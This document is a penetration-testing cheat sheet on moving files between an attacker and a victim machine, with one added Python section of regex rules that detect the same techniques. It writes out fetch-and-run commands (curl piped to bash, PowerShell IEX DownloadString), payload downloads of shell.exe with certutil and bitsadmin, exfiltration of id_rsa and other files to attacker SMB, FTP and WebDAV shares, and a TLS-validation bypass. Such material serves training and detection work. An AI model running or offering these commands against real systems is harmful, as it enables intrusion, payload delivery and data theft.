Wget/Curl
Two of the most common utilities in Linux distributions for interacting with web applications are `wget` and `curl`, and at least one of them is installed on many distributions by default.
python3 -m http.server 8000
wget http://{IP}:8000/LinEnum.sh -O /tmp/LinEnum.sh
curl http://{IP}:8000/LinEnum.sh -o /tmp/LinEnum.sh
nc
Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. It was released in 1995 and hasn't been maintained despite its popularity. In this example, we'll transfer `LinEnum.sh` from our attacker machine to the victim machine. First, start a listener on the victim machine that writes whatever it receives to `LinEnum.sh`:
nc -l -p 8000 > LinEnum.sh
We will connect to the victim machine on port 8000 using netcat and send the LinEnum.sh file as input to netcat. The `-q 0` will tell netcat to close the connection once it finishes. That way, we'll know when the file transfer is complete.
nc -q 0 {IP} 8000 < LinEnum.sh
Ncat
The computer networking utility tool Netcat (often abbreviated to nc) was released in 1995 and hasn't been maintained despite its popularity. The flexibility and usefulness of this tool prompted the Nmap Project to produce Ncat, a modern reimplementation that supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more.
In this example, we'll transfer `LinEnum.sh` from our attacker machine to the victim machine.
The `--recv-only` flag is used to close the connection once the file transfer is finished.
ncat -l -p 8000 --recv-only > LinEnum.sh
The `--send-only` flag is used to cause Ncat to quit when its input runs out.
ncat --send-only {IP} 8000 < LinEnum.sh
SSH
SSH comes with an SCP utility for remote file transfer. We can set up an SSH server on our attacker machine and use the SCP utility to transfer files.
sudo systemctl enable ssh
sudo systemctl start ssh
scp {USER}@{IP}:{FILE_TO_TRANSFER} {FILE_DESTINATION}
scp Administrator@10.10.138.42:/Users/Administrator/20220623131857_loot.zip .
Base64
Base64 encoding and decoding is limited to small files, but it is stealthy because it doesn't require network communication. We can encode a file with base64, copy the output to our victim machine and decode the base64 to get our file back.
cat id_rsa | base64 -w 0; echo
echo -n 'LS0tLS1CRU...' | base64 -d
Fileless
Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.
python3 -m http.server 8000
curl http://{IP}:8000/LinEnum.sh | bash
curl http://{IP}:8000/helloworld.py | python3
PHP
We can use a simple PHP webserver to transfer files.
php -S 0.0.0.0:8000
wget http://{IP}:8000/{FILE}
Python2
We can use a simple Python 2 webserver to transfer files.
python2.7 -m SimpleHTTPServer
wget http://{IP}:8000/{FILE}
Python3
We can use a simple Python 3 webserver to transfer files.
python3 -m http.server 8000
wget http://{IP}:8000/{FILE}
Ruby
We can use a simple Ruby webserver to transfer files.
ruby -run -ehttpd . -p8000
wget http://{IP}:8000/{FILE}
Bitsadmin
Bitsadmin is a Windows binary used for managing Background Intelligent Transfer Service (BITS) jobs.
python3 -m http.server 8000
bitsadmin.exe /transfer /Download /priority Foreground http://{IP}:8000/shell.exe c:\Users\thm\Desktop\shell.exe
Certutil
Certutil is a Windows binary used for handling certificates.
python3 -m http.server 8000
certutil.exe -urlcache -split -f http://{IP}:8000/sharphound.exe sharphound.exe
FTP
We can set up an FTP server using `pyftpdlib` on our attacker machine to transfer files.
sudo pip3 install pyftpdlib
By default, `pyftpdlib` uses port 2121. We can specify port 21 if preferred.
sudo python3 -m pyftpdlib --port 21
(New-Object Net.WebClient).DownloadFile('ftp://{IP}/file.txt', 'ftp-file.txt')
PowerShell DownloadFile
PowerShell offers many file transfer options. The `DownloadFile` method of the System.Net.WebClient class can be used to download a file over HTTP, HTTPS, or FTP.
python3 -m http.server 8000
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PowerShell WebRequest
From PowerShell 3.0 onwards, the Invoke-WebRequest cmdlet is also available, but is noticeably slower at downloading files. You can use the aliases `iwr`, `curl`, and `wget` instead of the `Invoke-WebRequest` full name.
python3 -m http.server 8000
Invoke-WebRequest -Uri 'http://{IP}:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'
wget 'http://{IP}:8000/shell.exe'
curl 'http://{IP}:8000/shell.exe' -o shell.exe
iwr -Uri 'http://{IP}:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'
PowerShell Base64
We can encode a file to a base64 string, copy its contents from the terminal and perform the reverse operation, decoding the string back into the original file. This method is not always possible to use: cmd.exe has a maximum string length of 8191 characters, and a web shell may error if you attempt to send extremely large strings.
cat id_rsa | base64 -w 0; echo
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1..."))
PowerShell Fileless
Fileless attacks work by using some operating system functions to download the payload and execute it directly. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias IEX.
python3 -m http.server 8000
iex(New-Object Net.WebClient).DownloadString('http://{IP}:8000/{SCRIPT}.ps1')
SMB
We can use impacket's `smbserver.py` script to create an SMB server on our attacker machine.
smbserver.py kali .
copy \\{attackerIP}\kali\{file} .
SMB Authenticated
New versions of Windows block unauthenticated guest access. You will receive the following error when trying to copy files from an SMB share in an unauthenticated manner: `You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.`
To transfer files in this scenario, we can set a username and password using our Impacket SMB server and mount the SMB server on our Windows target machine.
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
net use n: \\192.168.220.133\share /user:test test
copy n:\nc.exe
XFreeRDP
You can mount your local home directory as a drive in the RDP session and access it from `This PC`.
xfreerdp /u:thm /p:Password /v:10.10.123.123 /workarea +home-drive
Explorer Error
When trying to download a file, you may come across the following error: `The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.`
This error occurs when Internet Explorer's first-launch configuration has not been completed, which prevents the download.
This error can be bypassed with the `-UseBasicParsing` flag.
python3 -m http.server 8000
Invoke-WebRequest https://{IP}/shell.exe -UseBasicParsing | IEX
SSL/TLS Error
When downloading a file, you may come across this error: `Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."`
This error occurs because the certificate is not trusted. We can bypass this error with the following command, which disables certificate validation for the rest of the PowerShell session:
python3 -m http.server 8000
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
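As an added example (not from the original page), here is a small detection pass over constructed process-creation log lines for the download techniques described above: the Certutil and Bitsadmin downloads, the PowerShell WebClient `DownloadString` piped into IEX, the `ServerCertificateValidationCallback` override, and the Linux `curl | bash` fileless pattern. The Sysmon-like log format and the host 10.0.0.5 are assumptions made for the example.

```python
import re

# Constructed process-creation log lines in a Sysmon-like "Image=... CommandLine=..." form.
# Written for this example (not captured telemetry); host 10.0.0.5 is an assumption.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\certutil.exe CommandLine=certutil.exe -urlcache -split -f http://10.0.0.5:8000/sharphound.exe sharphound.exe",
    "Image=C:\\Windows\\System32\\bitsadmin.exe CommandLine=bitsadmin.exe /transfer /Download /priority Foreground http://10.0.0.5:8000/shell.exe c:\\Users\\thm\\Desktop\\shell.exe",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell -c \"iex(New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/run.ps1')\"",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell -c \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\"",
    "Image=/usr/bin/bash CommandLine=bash -c \"curl http://10.0.0.5:8000/LinEnum.sh | bash\"",
    "Image=C:\\Windows\\System32\\certutil.exe CommandLine=certutil.exe -hashfile C:\\tools\\tool.exe SHA256",  # benign use
]

# One rule per technique on this page, matched case-insensitively against the command line.
RULES = {
    "certutil_urlcache_download": re.compile(r"certutil(\.exe)?\s.*-urlcache\s.*-f\s+\S+://", re.I),
    "bitsadmin_transfer_download": re.compile(r"bitsadmin(\.exe)?\s+/transfer\b.*\S+://", re.I),
    "powershell_downloadstring_iex": re.compile(r"\b(iex|invoke-expression)\b.*downloadstring\s*\(", re.I),
    "powershell_cert_validation_disabled": re.compile(r"servercertificatevalidationcallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "curl_wget_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", re.I),
}

def parse_command_line(event):
    """Return the CommandLine field of a log line, or '' if the field is absent."""
    match = re.search(r"CommandLine=(.*)$", event)
    return match.group(1) if match else ""

def normalise(cmdline):
    """Collapse runs of whitespace so padded or tab-separated arguments still match."""
    return re.sub(r"\s+", " ", cmdline).strip()

def match_rules(cmdline):
    """Return the names of all rules that fire on one command line (empty list if none)."""
    norm = normalise(cmdline)
    return [name for name, rx in RULES.items() if rx.search(norm)]

def triage(events):
    """Map each event to (command line, [rule names]); benign lines get an empty list."""
    return [(parse_command_line(e), match_rules(parse_command_line(e))) for e in events]

if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS):
        print(hits or ["no match"], "<-", cmdline)
```

The `-hashfile` line shows why the rules key on the download-specific arguments rather than on the binary name alone: certutil and bitsadmin have legitimate uses on most hosts.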
FTP
We can use PowerShell or the FTP client to upload files to an FTP server.
Using the Python module `pyftpdlib`, we need to specify the option `--write` to allow clients to upload files to our attacker machine.
sudo python3 -m pyftpdlib --port 21 --write
(New-Object Net.WebClient).UploadFile('ftp://{IP}/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
Base64
We can use base64 to encode a file and copy the base64 to our attacker machine to decode it.
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
echo IyBDb3B5cm... | base64 -d
SMB
We can use impacket's `smbserver.py` script to create an SMB server on our attacker machine and upload files to it.
smbserver.py -smb2support test $(pwd)
copy {FILE_TO_COPY} \\{ATTACKER_IP}\test
SMB over HTTP
Companies usually allow outbound traffic using the HTTP (TCP/80) and HTTPS (TCP/443) protocols. Enterprises commonly don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks.
An alternative is to run SMB over HTTP with WebDAV. WebDAV is an extension of HTTP that enables a webserver to behave like a fileserver, supporting collaborative content authoring. WebDAV can also use HTTPS.
When Windows is given a UNC path, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will fall back to connecting using WebDAV over HTTP.
To setup our WebDAV server, we need to install two Python modules, `wsgidav` and `cheroot`.
sudo pip install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Connect to the WebDAV share.
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\